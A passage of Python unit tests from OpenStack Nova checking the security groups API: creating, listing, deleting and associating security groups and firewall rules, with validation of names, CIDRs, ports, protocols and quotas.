raise exception.InstanceNotFound(instance_id=server_id)
class TestSecurityGroups(test.TestCase):
def setUp(self):
super(TestSecurityGroups, self).setUp()
self.controller = security_groups.SecurityGroupController()
self.server_controller = (
security_groups.ServerSecurityGroupController())
self.manager = security_groups.SecurityGroupActionController()
# This needs to be done here to set fake_id because the derived
# class needs to be called first if it wants to set
# 'security_group_api' and this setUp method needs to be called.
if self.controller.security_group_api.id_is_uuid:
self.fake_id = '11111111-1111-1111-1111-111111111111'
else:
self.fake_id = '11111111'
def _assert_no_security_groups_reserved(self, context):
"""Check that no reservations are leaked during tests."""
result = quota.QUOTAS.get_project_quotas(context, context.project_id)
self.assertEqual(result['security_groups']['reserved'], 0)
def test_create_security_group(self):
sg = security_group_template()
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
res_dict = self.controller.create(req, {'security_group': sg})
self.assertEqual(res_dict['security_group']['name'], 'test')
self.assertEqual(res_dict['security_group']['description'],
'test-description')
def test_create_security_group_with_no_name(self):
sg = security_group_template()
del sg['name']
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
self.assertRaises(webob.exc.HTTPUnprocessableEntity,
self.controller.create, req, sg)
self._assert_no_security_groups_reserved(req.environ['nova.context'])
def test_create_security_group_with_no_description(self):
sg = security_group_template()
del sg['description']
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group': sg})
self._assert_no_security_groups_reserved(req.environ['nova.context'])
def test_create_security_group_with_blank_name(self):
sg = security_group_template(name='')
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group': sg})
self._assert_no_security_groups_reserved(req.environ['nova.context'])
def test_create_security_group_with_whitespace_name(self):
sg = security_group_template(name=' ')
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group': sg})
self._assert_no_security_groups_reserved(req.environ['nova.context'])
def test_create_security_group_with_blank_description(self):
sg = security_group_template(description='')
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group': sg})
self._assert_no_security_groups_reserved(req.environ['nova.context'])
def test_create_security_group_with_whitespace_description(self):
sg = security_group_template(description=' ')
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group': sg})
self._assert_no_security_groups_reserved(req.environ['nova.context'])
def test_create_security_group_with_duplicate_name(self):
sg = security_group_template()
# FIXME: Stub out _get instead of creating twice
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
self.controller.create(req, {'security_group': sg})
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group': sg})
self._assert_no_security_groups_reserved(req.environ['nova.context'])
def test_create_security_group_with_no_body(self):
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
self.assertRaises(webob.exc.HTTPUnprocessableEntity,
self.controller.create, req, None)
self._assert_no_security_groups_reserved(req.environ['nova.context'])
def test_create_security_group_with_no_security_group(self):
body = {'no-securityGroup': None}
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
self.assertRaises(webob.exc.HTTPUnprocessableEntity,
self.controller.create, req, body)
self._assert_no_security_groups_reserved(req.environ['nova.context'])
def test_create_security_group_above_255_characters_name(self):
sg = security_group_template(name='1234567890' * 26)
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group': sg})
self._assert_no_security_groups_reserved(req.environ['nova.context'])
def test_create_security_group_above_255_characters_description(self):
sg = security_group_template(description='1234567890' * 26)
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group': sg})
self._assert_no_security_groups_reserved(req.environ['nova.context'])
def test_create_security_group_non_string_name(self):
sg = security_group_template(name=12)
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group': sg})
self._assert_no_security_groups_reserved(req.environ['nova.context'])
def test_create_security_group_non_string_description(self):
sg = security_group_template(description=12)
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group': sg})
self._assert_no_security_groups_reserved(req.environ['nova.context'])
def test_create_security_group_quota_limit(self):
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
for num in range(1, CONF.quota_security_groups + 1):
name = 'test%s' % num
sg = security_group_template(name=name)
res_dict = self.controller.create(req, {'security_group': sg})
self.assertEqual(res_dict['security_group']['name'], name)
sg = security_group_template()
self.assertRaises(exception.SecurityGroupLimitExceeded,
self.controller.create,
req, {'security_group': sg})
def test_get_security_group_list(self):
groups = []
for i, name in enumerate(['default', 'test']):
sg = security_group_template(id=i + 1,
name=name,
description=name + '-desc',
rules=[])
groups.append(sg)
expected = {'security_groups': groups}
def return_security_groups(context, project_id):
return [security_group_db(sg) for sg in groups]
self.stubs.Set(nova.db, 'security_group_get_by_project',
return_security_groups)
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups')
res_dict = self.controller.index(req)
self.assertEquals(res_dict, expected)
def test_get_security_group_list_all_tenants(self):
all_groups = []
tenant_groups = []
for i, name in enumerate(['default', 'test']):
sg = security_group_template(id=i + 1,
name=name,
description=name + '-desc',
rules=[])
all_groups.append(sg)
if name == 'default':
tenant_groups.append(sg)
all = {'security_groups': all_groups}
tenant_specific = {'security_groups': tenant_groups}
def return_all_security_groups(context):
return [security_group_db(sg) for sg in all_groups]
self.stubs.Set(nova.db, 'security_group_get_all',
return_all_security_groups)
def return_tenant_security_groups(context, project_id):
return [security_group_db(sg) for sg in tenant_groups]
self.stubs.Set(nova.db, 'security_group_get_by_project',
return_tenant_security_groups)
path = '/v2/fake/os-security-groups'
req = fakes.HTTPRequest.blank(path, use_admin_context=True)
res_dict = self.controller.index(req)
self.assertEquals(res_dict, tenant_specific)
req = fakes.HTTPRequest.blank('%s?all_tenants=1' % path,
use_admin_context=True)
res_dict = self.controller.index(req)
self.assertEquals(res_dict, all)
def test_get_security_group_by_instance(self):
groups = []
for i, name in enumerate(['default', 'test']):
sg = security_group_template(id=i + 1,
name=name,
description=name + '-desc',
rules=[])
groups.append(sg)
expected = {'security_groups': groups}
def return_instance(context, server_id):
self.assertEquals(server_id, FAKE_UUID1)
return return_server_by_uuid(context, server_id)
self.stubs.Set(nova.db, 'instance_get_by_uuid',
return_instance)
def return_security_groups(context, instance_id):
self.assertEquals(instance_id, 1)
return [security_group_db(sg) for sg in groups]
self.stubs.Set(nova.db, 'security_group_get_by_instance',
return_security_groups)
req = fakes.HTTPRequest.blank('/v2/%s/servers/%s/os-security-groups' %
('fake', FAKE_UUID1))
res_dict = self.server_controller.index(req, FAKE_UUID1)
self.assertEquals(res_dict, expected)
def test_get_security_group_by_instance_non_existing(self):
self.stubs.Set(nova.db, 'instance_get', return_server_nonexistent)
self.stubs.Set(nova.db, 'instance_get_by_uuid',
return_server_nonexistent)
req = fakes.HTTPRequest.blank('/v2/fake/servers/1/os-security-groups')
self.assertRaises(webob.exc.HTTPNotFound,
self.server_controller.index, req, '1')
def test_get_security_group_by_instance_invalid_id(self):
req = fakes.HTTPRequest.blank(
'/v2/fake/servers/invalid/os-security-groups')
self.assertRaises(webob.exc.HTTPNotFound,
self.server_controller.index, req, 'invalid')
def test_get_security_group_by_id(self):
sg = security_group_template(id=2, rules=[])
def return_security_group(context, group_id):
self.assertEquals(sg['id'], group_id)
return security_group_db(sg)
self.stubs.Set(nova.db, 'security_group_get',
return_security_group)
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups/2')
res_dict = self.controller.show(req, '2')
expected = {'security_group': sg}
self.assertEquals(res_dict, expected)
def test_get_security_group_by_invalid_id(self):
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups/invalid')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.delete,
req, 'invalid')
def test_get_security_group_by_non_existing_id(self):
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups/%s' %
self.fake_id)
self.assertRaises(webob.exc.HTTPNotFound, self.controller.delete,
req, self.fake_id)
def test_delete_security_group_by_id(self):
sg = security_group_template(id=1, rules=[])
self.called = False
def security_group_destroy(context, id):
self.called = True
def return_security_group(context, group_id):
self.assertEquals(sg['id'], group_id)
return security_group_db(sg)
self.stubs.Set(nova.db, 'security_group_destroy',
security_group_destroy)
self.stubs.Set(nova.db, 'security_group_get',
return_security_group)
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups/1')
self.controller.delete(req, '1')
self.assertTrue(self.called)
def test_delete_security_group_by_invalid_id(self):
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups/invalid')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.delete,
req, 'invalid')
def test_delete_security_group_by_non_existing_id(self):
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups/%s'
% self.fake_id)
self.assertRaises(webob.exc.HTTPNotFound, self.controller.delete,
req, self.fake_id)
def test_delete_security_group_in_use(self):
sg = security_group_template(id=1, rules=[])
def security_group_in_use(context, id):
return True
def return_security_group(context, group_id):
self.assertEquals(sg['id'], group_id)
return security_group_db(sg)
self.stubs.Set(nova.db, 'security_group_in_use',
security_group_in_use)
self.stubs.Set(nova.db, 'security_group_get',
return_security_group)
req = fakes.HTTPRequest.blank('/v2/fake/os-security-groups/1')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.delete,
req, '1')
def test_associate_by_non_existing_security_group_name(self):
self.stubs.Set(nova.db, 'instance_get', return_server)
self.assertEquals(return_server(None, '1'),
nova.db.instance_get(None, '1'))
body = dict(addSecurityGroup=dict(name='non-existing'))
req = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
self.assertRaises(webob.exc.HTTPNotFound,
self.manager._addSecurityGroup, req, '1', body)
def test_associate_by_invalid_server_id(self):
body = dict(addSecurityGroup=dict(name='test'))
req = fakes.HTTPRequest.blank('/v2/fake/servers/invalid/action')
self.assertRaises(webob.exc.HTTPNotFound,
self.manager._addSecurityGroup, req, 'invalid', body)
def test_associate_without_body(self):
self.stubs.Set(nova.db, 'instance_get', return_server)
body = dict(addSecurityGroup=None)
req = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
self.assertRaises(webob.exc.HTTPBadRequest,
self.manager._addSecurityGroup, req, '1', body)
def test_associate_no_security_group_name(self):
self.stubs.Set(nova.db, 'instance_get', return_server)
body = dict(addSecurityGroup=dict())
req = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
self.assertRaises(webob.exc.HTTPBadRequest,
self.manager._addSecurityGroup, req, '1', body)
def test_associate_security_group_name_with_whitespaces(self):
self.stubs.Set(nova.db, 'instance_get', return_server)
body = dict(addSecurityGroup=dict(name=" "))
req = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
self.assertRaises(webob.exc.HTTPBadRequest,
self.manager._addSecurityGroup, req, '1', body)
def test_associate_non_existing_instance(self):
self.stubs.Set(nova.db, 'instance_get', return_server_nonexistent)
self.stubs.Set(nova.db, 'instance_get_by_uuid',
return_server_nonexistent)
body = dict(addSecurityGroup=dict(name="test"))
req = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
self.assertRaises(webob.exc.HTTPNotFound,
self.manager._addSecurityGroup, req, '1', body)
def test_associate_non_running_instance(self):
self.stubs.Set(nova.db, 'instance_get', return_non_running_server)
self.stubs.Set(nova.db, 'instance_get_by_uuid',
return_non_running_server)
self.stubs.Set(nova.db, 'security_group_get_by_name',
return_security_group_without_instances)
body = dict(addSecurityGroup=dict(name="test"))
req = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
self.assertRaises(webob.exc.HTTPBadRequest,
self.manager._addSecurityGroup, req, '1', body)
def test_associate_already_associated_security_group_to_instance(self):
self.stubs.Set(nova.db, 'instance_get', return_server)
self.stubs.Set(nova.db, 'instance_get_by_uuid',
return_server_by_uuid)
self.stubs.Set(nova.db, 'security_group_get_by_name',
return_security_group_by_name)
body = dict(addSecurityGroup=dict(name="test"))
req = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
self.assertRaises(webob.exc.HTTPBadRequest,
self.manager._addSecurityGroup, req, '1', body)
def test_associate(self):
self.stubs.Set(nova.db, 'instance_get', return_server)
self.stubs.Set(nova.db, 'instance_get_by_uuid',
return_server_by_uuid)
self.mox.StubOutWithMock(nova.db, 'instance_add_security_group')
nova.db.instance_add_security_group(mox.IgnoreArg(),
mox.IgnoreArg(),
mox.IgnoreArg())
self.stubs.Set(nova.db, 'security_group_get_by_name',
return_security_group_without_instances)
self.mox.ReplayAll()
body = dict(addSecurityGroup=dict(name="test"))
req = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
self.manager._addSecurityGroup(req, '1', body)
def test_disassociate_by_non_existing_security_group_name(self):
self.stubs.Set(nova.db, 'instance_get', return_server)
self.assertEquals(return_server(None, '1'),
nova.db.instance_get(None, '1'))
body = dict(removeSecurityGroup=dict(name='non-existing'))
req = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
self.assertRaises(webob.exc.HTTPNotFound,
self.manager._removeSecurityGroup, req, '1', body)
def test_disassociate_by_invalid_server_id(self):
self.stubs.Set(nova.db, 'security_group_get_by_name',
return_security_group_by_name)
body = dict(removeSecurityGroup=dict(name='test'))
req = fakes.HTTPRequest.blank('/v2/fake/servers/invalid/action')
self.assertRaises(webob.exc.HTTPNotFound,
self.manager._removeSecurityGroup, req, 'invalid',
body)
def test_disassociate_without_body(self):
self.stubs.Set(nova.db, 'instance_get', return_server)
body = dict(removeSecurityGroup=None)
req = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
self.assertRaises(webob.exc.HTTPBadRequest,
self.manager._removeSecurityGroup, req, '1', body)
def test_disassociate_no_security_group_name(self):
self.stubs.Set(nova.db, 'instance_get', return_server)
body = dict(removeSecurityGroup=dict())
req = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
self.assertRaises(webob.exc.HTTPBadRequest,
self.manager._removeSecurityGroup, req, '1', body)
def test_disassociate_security_group_name_with_whitespaces(self):
self.stubs.Set(nova.db, 'instance_get', return_server)
body = dict(removeSecurityGroup=dict(name=" "))
req = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
self.assertRaises(webob.exc.HTTPBadRequest,
self.manager._removeSecurityGroup, req, '1', body)
def test_disassociate_non_existing_instance(self):
self.stubs.Set(nova.db, 'instance_get', return_server_nonexistent)
self.stubs.Set(nova.db, 'security_group_get_by_name',
return_security_group_by_name)
body = dict(removeSecurityGroup=dict(name="test"))
req = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
self.assertRaises(webob.exc.HTTPNotFound,
self.manager._removeSecurityGroup, req, '1', body)
def test_disassociate_non_running_instance(self):
self.stubs.Set(nova.db, 'instance_get', return_non_running_server)
self.stubs.Set(nova.db, 'instance_get_by_uuid',
return_non_running_server)
self.stubs.Set(nova.db, 'security_group_get_by_name',
return_security_group_by_name)
body = dict(removeSecurityGroup=dict(name="test"))
req = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
self.assertRaises(webob.exc.HTTPBadRequest,
self.manager._removeSecurityGroup, req, '1', body)
def test_disassociate_already_associated_security_group_to_instance(self):
self.stubs.Set(nova.db, 'instance_get', return_server)
self.stubs.Set(nova.db, 'instance_get_by_uuid',
return_server_by_uuid)
self.stubs.Set(nova.db, 'security_group_get_by_name',
return_security_group_without_instances)
body = dict(removeSecurityGroup=dict(name="test"))
req = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
self.assertRaises(webob.exc.HTTPBadRequest,
self.manager._removeSecurityGroup, req, '1', body)
def test_disassociate(self):
self.stubs.Set(nova.db, 'instance_get', return_server)
self.stubs.Set(nova.db, 'instance_get_by_uuid',
return_server_by_uuid)
self.mox.StubOutWithMock(nova.db, 'instance_remove_security_group')
nova.db.instance_remove_security_group(mox.IgnoreArg(),
mox.IgnoreArg(),
mox.IgnoreArg())
self.stubs.Set(nova.db, 'security_group_get_by_name',
return_security_group_by_name)
self.mox.ReplayAll()
body = dict(removeSecurityGroup=dict(name="test"))
req = fakes.HTTPRequest.blank('/v2/fake/servers/1/action')
self.manager._removeSecurityGroup(req, '1', body)
class TestSecurityGroupRules(test.TestCase):
def setUp(self):
super(TestSecurityGroupRules, self).setUp()
self.controller = security_groups.SecurityGroupController()
if self.controller.security_group_api.id_is_uuid:
id1 = '11111111-1111-1111-1111-111111111111'
id2 = '22222222-2222-2222-2222-222222222222'
self.invalid_id = '33333333-3333-3333-3333-333333333333'
else:
id1 = 1
id2 = 2
self.invalid_id = '33333333'
self.sg1 = security_group_template(id=id1)
self.sg2 = security_group_template(
id=id2, name='authorize_revoke',
description='authorize-revoke testing')
db1 = security_group_db(self.sg1)
db2 = security_group_db(self.sg2)
def return_security_group(context, group_id):
if group_id == db1['id']:
return db1
if group_id == db2['id']:
return db2
raise exception.NotFound()
self.stubs.Set(nova.db, 'security_group_get',
return_security_group)
self.parent_security_group = db2
self.controller = security_groups.SecurityGroupRulesController()
def test_create_by_cidr(self):
rule = security_group_rule_template(cidr='10.2.3.124/24',
parent_group_id=self.sg2['id'])
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
res_dict = self.controller.create(req, {'security_group_rule': rule})
security_group_rule = res_dict['security_group_rule']
self.assertNotEquals(security_group_rule['id'], 0)
self.assertEquals(security_group_rule['parent_group_id'],
self.sg2['id'])
self.assertEquals(security_group_rule['ip_range']['cidr'],
"10.2.3.124/24")
def test_create_by_group_id(self):
rule = security_group_rule_template(group_id=self.sg1['id'],
parent_group_id=self.sg2['id'])
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
res_dict = self.controller.create(req, {'security_group_rule': rule})
security_group_rule = res_dict['security_group_rule']
self.assertNotEquals(security_group_rule['id'], 0)
self.assertEquals(security_group_rule['parent_group_id'],
self.sg2['id'])
def test_create_by_same_group_id(self):
rule1 = security_group_rule_template(group_id=self.sg1['id'],
from_port=80, to_port=80,
parent_group_id=self.sg2['id'])
self.parent_security_group['rules'] = [security_group_rule_db(rule1)]
rule2 = security_group_rule_template(group_id=self.sg1['id'],
from_port=81, to_port=81,
parent_group_id=self.sg2['id'])
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
res_dict = self.controller.create(req, {'security_group_rule': rule2})
security_group_rule = res_dict['security_group_rule']
self.assertNotEquals(security_group_rule['id'], 0)
self.assertEquals(security_group_rule['parent_group_id'],
self.sg2['id'])
self.assertEquals(security_group_rule['from_port'], 81)
self.assertEquals(security_group_rule['to_port'], 81)
def test_create_by_invalid_cidr_json(self):
rule = security_group_rule_template(
ip_protocol="tcp",
from_port=22,
to_port=22,
parent_group_id=self.sg2['id'],
cidr="10.2.3.124/2433")
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group_rule': rule})
def test_create_by_invalid_tcp_port_json(self):
rule = security_group_rule_template(
ip_protocol="tcp",
from_port=75534,
to_port=22,
parent_group_id=self.sg2['id'],
cidr="10.2.3.124/24")
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group_rule': rule})
def test_create_by_invalid_icmp_port_json(self):
rule = security_group_rule_template(
ip_protocol="icmp",
from_port=1,
to_port=256,
parent_group_id=self.sg2['id'],
cidr="10.2.3.124/24")
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group_rule': rule})
def test_create_add_existing_rules_by_cidr(self):
rule = security_group_rule_template(cidr='10.0.0.0/24',
parent_group_id=self.sg2['id'])
self.parent_security_group['rules'] = [security_group_rule_db(rule)]
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group_rule': rule})
def test_create_add_existing_rules_by_group_id(self):
rule = security_group_rule_template(group_id=1)
self.parent_security_group['rules'] = [security_group_rule_db(rule)]
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group_rule': rule})
def test_create_with_no_body(self):
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
self.assertRaises(webob.exc.HTTPUnprocessableEntity,
self.controller.create, req, None)
def test_create_with_no_security_group_rule_in_body(self):
rules = {'test': 'test'}
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
self.assertRaises(webob.exc.HTTPUnprocessableEntity,
self.controller.create, req, rules)
def test_create_with_invalid_parent_group_id(self):
rule = security_group_rule_template(parent_group_id='invalid')
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group_rule': rule})
def test_create_with_non_existing_parent_group_id(self):
rule = security_group_rule_template(group_id='invalid',
parent_group_id=self.invalid_id)
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
self.assertRaises(webob.exc.HTTPNotFound, self.controller.create,
req, {'security_group_rule': rule})
def test_create_with_invalid_protocol(self):
rule = security_group_rule_template(ip_protocol='invalid-protocol',
cidr='10.2.2.0/24',
parent_group_id=self.sg2['id'])
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group_rule': rule})
def test_create_with_no_protocol(self):
rule = security_group_rule_template(cidr='10.2.2.0/24',
parent_group_id=self.sg2['id'])
del rule['ip_protocol']
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group_rule': rule})
def test_create_with_invalid_from_port(self):
rule = security_group_rule_template(from_port='666666',
cidr='10.2.2.0/24',
parent_group_id=self.sg2['id'])
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group_rule': rule})
def test_create_with_invalid_to_port(self):
rule = security_group_rule_template(to_port='666666',
cidr='10.2.2.0/24',
parent_group_id=self.sg2['id'])
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group_rule': rule})
def test_create_with_non_numerical_from_port(self):
rule = security_group_rule_template(from_port='invalid',
cidr='10.2.2.0/24',
parent_group_id=self.sg2['id'])
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group_rule': rule})
def test_create_with_non_numerical_to_port(self):
rule = security_group_rule_template(to_port='invalid',
cidr='10.2.2.0/24',
parent_group_id=self.sg2['id'])
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group_rule': rule})
def test_create_with_no_from_port(self):
rule = security_group_rule_template(cidr='10.2.2.0/24',
parent_group_id=self.sg2['id'])
del rule['from_port']
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group_rule': rule})
def test_create_with_no_to_port(self):
rule = security_group_rule_template(cidr='10.2.2.0/24',
parent_group_id=self.sg2['id'])
del rule['to_port']
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group_rule': rule})
def test_create_with_invalid_cidr(self):
rule = security_group_rule_template(cidr='10.2.2222.0/24',
parent_group_id=self.sg2['id'])
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group_rule': rule})
def test_create_with_no_cidr_group(self):
rule = security_group_rule_template(parent_group_id=self.sg2['id'])
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
res_dict = self.controller.create(req, {'security_group_rule': rule})
security_group_rule = res_dict['security_group_rule']
self.assertNotEquals(security_group_rule['id'], 0)
self.assertEquals(security_group_rule['parent_group_id'],
self.parent_security_group['id'])
self.assertEquals(security_group_rule['ip_range']['cidr'],
"0.0.0.0/0")
def test_create_with_invalid_group_id(self):
rule = security_group_rule_template(group_id='invalid',
parent_group_id=self.sg2['id'])
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group_rule': rule})
def test_create_with_empty_group_id(self):
rule = security_group_rule_template(group_id='',
parent_group_id=self.sg2['id'])
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group_rule': rule})
def test_create_with_nonexist_group_id(self):
rule = security_group_rule_template(group_id=self.invalid_id,
parent_group_id=self.sg2['id'])
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group_rule': rule})
def test_create_with_same_group_parent_id_and_group_id(self):
rule = security_group_rule_template(group_id=self.sg1['id'],
parent_group_id=self.sg1['id'])
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
res_dict = self.controller.create(req, {'security_group_rule': rule})
security_group_rule = res_dict['security_group_rule']
self.assertNotEquals(security_group_rule['id'], 0)
self.assertEquals(security_group_rule['parent_group_id'],
self.sg1['id'])
self.assertEquals(security_group_rule['group']['name'],
self.sg1['name'])
def _test_create_with_no_ports_and_no_group(self, proto):
rule = {'ip_protocol': proto, 'parent_group_id': self.sg2['id']}
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.create,
req, {'security_group_rule': rule})
def _test_create_with_no_ports(self, proto):
rule = {'ip_protocol': proto, 'parent_group_id': self.sg2['id'],
'group_id': self.sg1['id']}
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
res_dict = self.controller.create(req, {'security_group_rule': rule})
security_group_rule = res_dict['security_group_rule']
expected_rule = {
'from_port': 1, 'group': {'tenant_id': '123', 'name': 'test'},
'ip_protocol': proto, 'to_port': 65535, 'parent_group_id':
self.sg2['id'], 'ip_range': {}, 'id': security_group_rule['id']
}
if proto == 'icmp':
expected_rule['to_port'] = -1
expected_rule['from_port'] = -1
self.assertTrue(security_group_rule == expected_rule)
def test_create_with_no_ports_icmp(self):
self._test_create_with_no_ports_and_no_group('icmp')
self._test_create_with_no_ports('icmp')
def test_create_with_no_ports_tcp(self):
self._test_create_with_no_ports_and_no_group('tcp')
self._test_create_with_no_ports('tcp')
def test_create_with_no_ports_udp(self):
self._test_create_with_no_ports_and_no_group('udp')
self._test_create_with_no_ports('udp')
def _test_create_with_ports(self, proto, from_port, to_port):
rule = {
'ip_protocol': proto, 'from_port': from_port, 'to_port': to_port,
'parent_group_id': self.sg2['id'], 'group_id': self.sg1['id']
}
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
res_dict = self.controller.create(req, {'security_group_rule': rule})
security_group_rule = res_dict['security_group_rule']
expected_rule = {
'from_port': from_port,
'group': {'tenant_id': '123', 'name': 'test'},
'ip_protocol': proto, 'to_port': to_port, 'parent_group_id':
self.sg2['id'], 'ip_range': {}, 'id': security_group_rule['id']
}
self.assertTrue(security_group_rule['ip_protocol'] == proto)
self.assertTrue(security_group_rule['from_port'] == from_port)
self.assertTrue(security_group_rule['to_port'] == to_port)
self.assertTrue(security_group_rule == expected_rule)
def test_create_with_ports_icmp(self):
self._test_create_with_ports('icmp', 0, 1)
self._test_create_with_ports('icmp', 0, 0)
self._test_create_with_ports('icmp', 1, 0)
def test_create_with_ports_tcp(self):
self._test_create_with_ports('tcp', 1, 1)
self._test_create_with_ports('tcp', 1, 65535)
self._test_create_with_ports('tcp', 65535, 65535)
def test_create_with_ports_udp(self):
self._test_create_with_ports('udp', 1, 1)
self._test_create_with_ports('udp', 1, 65535)
self._test_create_with_ports('udp', 65535, 65535)
def test_delete(self):
rule = security_group_rule_template(id=self.sg2['id'],
parent_group_id=self.sg2['id'])
def security_group_rule_get(context, id):
return security_group_rule_db(rule)
def security_group_rule_destroy(context, id):
pass
self.stubs.Set(nova.db, 'security_group_rule_get',
security_group_rule_get)
self.stubs.Set(nova.db, 'security_group_rule_destroy',
security_group_rule_destroy)
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules/%s'
% self.sg2['id'])
self.controller.delete(req, self.sg2['id'])
def test_delete_invalid_rule_id(self):
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules' +
'/invalid')
self.assertRaises(webob.exc.HTTPBadRequest, self.controller.delete,
req, 'invalid')
def test_delete_non_existing_rule_id(self):
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules/%s'
% self.invalid_id)
self.assertRaises(webob.exc.HTTPNotFound, self.controller.delete,
req, self.invalid_id)
def test_create_rule_quota_limit(self):
req = fakes.HTTPRequest.blank('/v2/fake/os-security-group-rules')
for num in range(100, 100 + CONF.quota_security_group_rules):
rule = {
'ip_protocol': 'tcp', 'from_port': num,
'to_port': num, 'parent_group_id': self.sg2['id'],
